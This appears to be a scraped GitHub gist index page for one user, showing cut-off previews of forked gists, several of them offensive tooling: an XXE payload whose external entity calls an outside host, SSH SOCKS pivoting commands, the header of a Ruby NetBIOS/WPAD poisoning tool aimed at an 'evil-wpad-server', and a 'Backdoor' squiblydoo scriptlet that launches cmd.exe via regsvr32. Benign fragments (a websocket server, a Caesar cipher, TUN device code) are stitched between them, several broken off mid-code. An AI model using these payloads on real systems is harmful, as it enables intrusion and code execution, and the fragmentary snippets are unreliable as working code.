@00derp
00derp / XXE_payloads
Created January 24, 2018 05:32 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
function Invoke-Crash
{
$ImputString = "
00derp / ssh_tricks
Created January 17, 2017 22:53 — forked from sckalath/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
00derp / PythonSimpleWebsocket
Created December 20, 2016 13:22 — forked from rich20bb/PythonSimpleWebsocket
Simple websocket server in Python. Echoes back whatever is received. Works with Chrome, Firefox 16, IE 10.
import time
import struct
import socket
import hashlib
import base64
import sys
from select import select
import re
import logging
from threading import Thread
def caesar_encrypt(realText, step):
    outText = []
    cryptText = []
    uppercase = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
    lowercase = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
    for eachLetter in realText:
        if eachLetter in uppercase:
            index = uppercase.index(eachLetter)
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'socket'
require 'ipaddr'
#
# Poison a system's NetBIOS resolver for the WPAD name from outside NAT (not BadTunnel)
#
# Usage: ruby netbios-brute-nat.rb <evil-wpad-server> <pps>
00derp / Backdoor-Minimalist.sct
Created April 22, 2016 14:35
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
import fcntl
import os
import struct
import subprocess
# Some constants used to ioctl the device file. I got them by a simple C
# program.
TUNSETIFF = 0x400454ca
TUNSETOWNER = TUNSETIFF + 2